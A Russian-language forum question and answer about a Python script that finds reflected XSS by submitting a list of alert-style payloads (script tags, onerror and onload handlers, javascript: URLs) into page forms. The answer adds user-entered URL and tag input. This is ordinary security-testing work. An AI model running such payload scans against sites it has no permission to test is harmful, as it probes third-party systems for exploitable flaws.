Python: поиск XSS-уязвимостей парсингом страницы с вводом URL и тега

Рейтинг: -3 · Ответов: 1 · Опубликовано: 30.07.2025

Ниже приведён мой код, который парсит страницу и ищет XSS-уязвимости. Сейчас адрес для проверки (локальный хост) и тег жёстко заданы в программе. Как передавать URL, теги и атрибуты через input()? Например: url_input = input("введите url: "), teg_input = input("введите тег: "), type_input = input("введите тип: ")

import requests
from bs4 import BeautifulSoup

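def test_xss(url):
    """Submit each probe string to the text inputs of every form on *url*.

    A probe counts as a hit when the response body contains it verbatim,
    which means the application echoed it without HTML-encoding. This is
    an indicator of reflected XSS, not proof: the echo may land in a
    response that is not rendered as HTML, so every hit needs manual
    confirmation. Stored and DOM-based XSS are not detected.

    Args:
        url: Address of the page whose forms are checked.

    Prints one line for each form that reflects a probe, or a single
    "not found" line when none does. Network errors from ``requests``
    propagate to the caller.
    """
    # Local import: the file only brings in requests and BeautifulSoup.
    from urllib.parse import urljoin

    payloads = [
        '<form action="javascript:alert(\'XSS\')"><input type="submit"></form>',
        '<script>alert("XSS")</script>',
        '"><script>alert("XSS")</script>',
        '"><img src=x onerror=alert("XSS")>',
        'javascript:alert("XSS")',
        '<body onload=alert("XSS")>',
        '"><svg/onload=alert("XSS")>',
        '<iframe src="javascript:alert(\'XSS\');">',
        '\'"--><script>alert("XSS")</script>',
        '<img src="x" onerror="alert(\'XSS\')">',
        '<input type="text" value="<script>alert(\'XSS\')</script>">',
        # you can add as much as you want
    ]
    # Seconds; without a timeout an unresponsive server blocks the run.
    timeout = 10

    response = requests.get(url, timeout=timeout)
    soup = BeautifulSoup(response.text, 'html.parser')
    found_xss = False

    for form in soup.find_all('form'):
        # A form without an action attribute submits to the page itself, and
        # plain string concatenation breaks on absolute or relative actions.
        # NOTE(review): the action may resolve to a host other than the one
        # in url -- confirm that host is in scope for the test.
        target = urljoin(url, form.get('action') or '')
        method = form.get('method', 'get').lower()

        # (name, fixed value) pairs in document order; None marks a text
        # field that receives the probe.
        fields = []
        for input_tag in form.find_all('input'):
            input_name = input_tag.get('name')
            if not input_name:
                # Unnamed controls are never submitted by a browser.
                continue
            input_type = input_tag.get('type', 'text').lower()
            if input_type == 'text':
                fields.append((input_name, None))
            elif input_type == 'hidden':
                fields.append((input_name, input_tag.get('value', '')))

        if all(value is not None for _, value in fields):
            # No text field to carry a probe, so a request proves nothing.
            continue

        for payload in payloads:
            data = {
                name: payload if value is None else value
                for name, value in fields
            }

            if method == 'post':
                response = requests.post(target, data=data, timeout=timeout)
            else:
                response = requests.get(target, params=data, timeout=timeout)

            if payload in response.text:
                print(f'XSS found ({payload}): {target}')
                found_xss = True
                # One reflected probe per form is enough to report it.
                break

    if not found_xss:
        print(f'XSS not found: {url}')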

# Page to check: a development server listening on the loopback interface.
test_url = 'http://127.0.0.1:5000'
test_xss(url=test_url)

Ответы

import re
import urllib.parse as up
import requests
from bs4 import BeautifulSoup

# Probe strings submitted to text inputs. A response that contains one of
# them verbatim did not HTML-encode the submitted value; the strings are
# compared byte-for-byte, so keep the quoting exactly as written.
PAYLOADS: list[str] = [
    '<form action="javascript:alert(\'XSS\')"><input type="submit"></form>',
    '<script>alert("XSS")</script>',
    '"><script>alert("XSS")</script>',
    '"><img src=x onerror=alert("XSS")>',
    'javascript:alert("XSS")',
    '<body onload=alert("XSS")>',
    '"><svg/onload=alert("XSS")>',
    '<iframe src="javascript:alert(\'XSS\');">',
    '\'"--><script>alert("XSS")</script>',
    '<img src="x" onerror="alert(\'XSS\')">',
    '<input type="text" value="<script>alert(\'XSS\')</script>">',
]


def build_full_url(base: str, action: str) -> str:
    """Resolve a form's ``action`` attribute against the page address.

    A missing or empty action yields *base* unchanged, which matches how a
    browser submits a form that has no action attribute.
    """
    relative = action if action else ""
    return up.urljoin(base, relative)


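def test_xss(url: str, tag_hint: str = "form") -> None:
    """Submit each probe string to the text inputs inside matching tags.

    The page at *url* is fetched, every element named *tag_hint* is
    located, and each probe from ``PAYLOADS`` is sent in the element's
    text inputs. A probe counts as a hit when the response body contains
    it verbatim, which means the value came back without HTML-encoding.
    That is an indicator of reflected XSS, not proof: the echo may sit in
    a response that is not rendered as HTML, so hits need manual
    confirmation. Stored and DOM-based XSS are not detected.

    Args:
        url: Page address; ``http://`` is prepended when no scheme is given.
        tag_hint: Tag name to search for, matched exactly and
            case-insensitively. An empty value falls back to ``"form"``.

    Returns:
        None. Results are printed.
    """
    url = url.strip()
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    tag_hint = tag_hint.strip() or "form"

    print(f"[+] Получение {url} …")
    try:
        resp = requests.get(url, timeout=10)
        resp.raise_for_status()
    except requests.RequestException as e:
        print(f"[!] Не удаётся найти {url}: {e}")
        return

    soup = BeautifulSoup(resp.text, "html.parser")

    # The hint comes from user input: escape it so it cannot be read as a
    # regular expression (an unbalanced "(" would raise re.error), and
    # anchor it so "a" selects <a> only, not every tag containing an "a".
    tag_pattern = re.compile(rf"^{re.escape(tag_hint)}$", re.I)
    tags = soup.find_all(tag_pattern)
    if not tags:
        print(f"[!] Нет найденных тегов  <{tag_hint}> .")
        return

    print(f"[+] Тег найден {len(tags)} <{tag_hint}> .")

    found = False
    for tag in tags:
        # NOTE(review): the action may resolve to a host other than the one
        # in url -- confirm that host is in scope for the test.
        action = build_full_url(url, tag.get("action"))
        method = tag.get("method", "get").lower()

        # (name, fixed value) pairs in document order; None marks a text
        # field that receives the probe.
        fields = []
        for inp in tag.find_all("input"):
            name = inp.get("name")
            if not name:
                continue
            if inp.get("type", "text").lower() == "text":
                fields.append((name, None))
            else:
                fields.append((name, inp.get("value", "")))

        if all(value is not None for _, value in fields):
            # Nothing would carry a probe (for example the hint selected an
            # element with no text inputs inside), so a request proves
            # nothing and would only add load on the server.
            continue

        for payload in PAYLOADS:
            data = {
                name: payload if value is None else value
                for name, value in fields
            }

            try:
                if method == "post":
                    r = requests.post(action, data=data, timeout=10)
                else:
                    r = requests.get(action, params=data, timeout=10)
            except requests.RequestException as e:
                print(f"[!] Запрос не выполнен {action}: {e}")
                continue

            if payload in r.text:
                print(f"[+] XSS найдена! Загрузчик: {payload} @ {action}")
                found = True
                # One reflected probe per element is enough to report it.
                break

    if not found:
        print("[-] Нет найденных загрузчиков.")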



# Ask for the page to check and the tag name to look for; an empty answer
# to the second prompt falls back to "form".
target = input("Enter URL: ").strip()
hint = input("Enter tag to fuzz inside (form / input / textarea …) [form]: ").strip() or "form"
test_xss(target, hint)